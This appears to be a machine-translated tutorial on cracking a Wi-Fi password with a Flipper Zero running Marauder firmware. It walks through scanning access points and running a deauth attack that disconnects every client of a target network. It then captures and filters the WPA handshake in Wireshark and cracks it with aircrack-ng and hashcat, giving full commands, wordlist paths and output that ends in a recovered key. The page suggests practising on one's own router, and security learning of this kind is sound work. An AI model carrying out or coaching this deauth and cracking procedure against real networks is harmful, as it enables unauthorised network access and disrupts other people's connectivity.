WiFi Password Cracking

On this page, you will learn how to perform a deauth attack with Flipper Zero to obtain a .pcap file containing the handshake (encrypted password) of a Wi-Fi network, and how to crack it.

WiFi Cracking

Let's look at the complete process of cracking a Wi-Fi password. The steps to follow are:

1. Have the Marauder Firmware installed

2. Scan the APs to find the target

3. Select the target AP ID

4. Select Sniff > Raw

5. Execute deauth attack

6. Download the .pcap file from qFlipper

7. Clean the .pcap file with Wireshark, filtering byeapol

8. Save new pcap file using only the handshake

9. Crack the .pcap with aircrack-ng or hashcat

1. Scan APs

Once we have Marauder installed, we can scan networks as follows:

1. Let's goGPIO > ESP > Wifi Marauder

1. We selectedScan ap

We can switch apto stationscanning for devices connected to networks.

1. We click it and it starts scanning all nearby Wi-Fi networks. This will help us identify the target network.

2. See list of APs

If we go to that section Listand select it, apwe see a detailed list of the available access points, each with an associated number. This number will be used to configure the deauth attack.

In our case, the target will be the network INHACKEABLE with the [missing information ID 1]. You can configure a vulnerable Wi-Fi network to follow these sections from your router settings.

3. Select the target AP

We press Select > apand enter the target network ID, in our case the 1, which corresponds to the network INHACKEABLE.

4. Enable Sniff Raw

In that section, Sniffwe selected the option raw. This will allow us to collect all the raw information about the Wi-Fi attacks.

5. Deauth Attack

Once all the previous steps are configured, select the option Attack > deauth, which will disconnect all devices from the target network. This is used to capture the handshake, which is the password for the encrypted Wi-Fi network.

Once the deauth attack starts (as soon as a device disconnects), we quickly go back and click on the option Sniff > rawwe had already configured to generate the .pcap file in the following path:

SD Card > app_data > marauder > pcaps

This file contains a lot of raw data, so we need to "clean" it to leave only the handshake and be able to crack it easily (if it has a weak password).

6. Clean the pcap with Wireshark

We're going to clean the .pcap file using Wireshark. To do this, we need to import the pcap file into Wireshark, filtering by [specific filter eapol]. We can do this by dragging the file into the interface or by opening it from File:

Applying the filter eapolwill show 4 messages. These are the 4 parts of the code 4 Way Handshake, used in modern networks to encrypt the password in plaintext.

Important : The pcap file must contain all four messages, as these are the components of the handshake. If you don't get it on the first try, you must repeat the process until you have all the components, or the cracking will not work. These components are generated when the device connected to the network disconnects and reconnects automatically.

Once filtered, we click on it File > Save asand give it the name we want, like handshake.pcap.

7. Handshake cracking with Aircrack-ng

The simplest way to crack a handshake is by using Aircrack-ng on Kali Linux, although we could also use hashcat.

For this example, we could create a file containing the network password. We could also use different dictionaries such as SecList , the Rockyou dictionary, or create our own dictionary with crunch, for example.

nano pass.txt

1234
12345t
4567
34567
34567
09876
654
7654
223456
87654
4567
2343456
Passw0rd123

# Con rockyou
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt *.pcap 

# Diccionario de contraseñas default en routers
sudo aircrack-ng -w /usr/share/seclists/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt *.pcap

# Con pass.txt
sudo aircrack-ng -w pass.txt handshake.pcap 

Using Rockyou

We must decompress the Rockyou dictionary before using it with the command:

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

Then we used aircrack-ng to start the cracking process

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt *.pcap

Reading packets, please wait...
Opening handshake.pcap
Opening sniffraw_2.pcap
Read 884 packets.

   #  BSSID              ESSID                     Encryption

   1  58:76:AC:02:2B:28  vodafoneBA2185            Unknown
   2  E4:66:AB:4C:31:EA  DIGIFIBRA-Z5RR            WPA (0 handshake)
   3  EA:66:AB:4C:31:EA  INHACKEABLE               WPA (1 handshake)
   4  F8:0D:A9:9F:A4:D1  DIGIFIBRA-D677            Unknown

Index number of target network ? 3

Reading packets, please wait...
Opening handshake.pcap
Opening sniffraw_2.pcap

      [00:01:56] 2049488/14344392 keys tested (17762.08 k/s) 

      Time left: 11 minutes, 32 seconds                         14.29%

                          KEY FOUND! [ Passw0rd123 ]


      Master Key     : 4B 83 63 7A 3F E0 DD 17 E9 42 7A 46 CC 16 E1 98 
                       05 16 F6 3D BC B9 4A 5D 65 B0 13 67 C7 A0 DB 8F 

      Transient Key  : 78 E4 58 5E EB AF 11 9E 29 E6 3D 6E B7 F2 46 B3 
                       FA BA 91 8E CC 6F 79 DF F6 A3 24 47 01 38 E1 18 
                       79 58 2D 22 A5 E5 F2 13 6E F7 05 B6 4D 67 6F 48 
                       70 68 3A EE 57 EB 14 2E 38 B2 70 6B 46 63 07 D2 

      EAPOL HMAC     : 6D 1D 58 AD 5D BC B7 93 62 B9 5C 41 20 E2 77 28 

The cracking works correctly and we obtain the password in plain text:Passw0rd123

8. Cracking with Hashcat

The advantage of using this method is that we can use the full power of the GPU to crack a handshake. To crack .pcap files with hashcat, we must convert them to a format that hashcat supports. We can do this using the following tool provided by hashcat itself:

hashcat hcxpcapngtool - advanced password recoveryhashcat.net

Once converted, it will generate a file with the extension .hc22000. We can easily crack this file using the following method -m 22000:

hashcat -m 22000 -d 1 handshake.hc22000 wordlist

# Con rockyou
hashcat -m 22000 -d 1 --status handshake.hc22000 /usr/share/wordlists/rockyou.txt

# Con ciccionario de contraseñas default en routers
hashcat -m 22000 -d 1 --status handshake.hc22000 /usr/share/seclists/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt

Explanation of the Parameters

• -m 22000→ Specifies that the hash is of the typeWPA-PMKID+EAPOL.

• -d 1→ Use the GPU with the index 1. Check hashcat -Iif this is correct for your system.

• --status→ Shows the progress of the attack in real time.

• handshake.hc22000→ File converted to Hashcat format from a .capusing hcxpcapngtool.

• Dictionary → Defines the list of passwords to test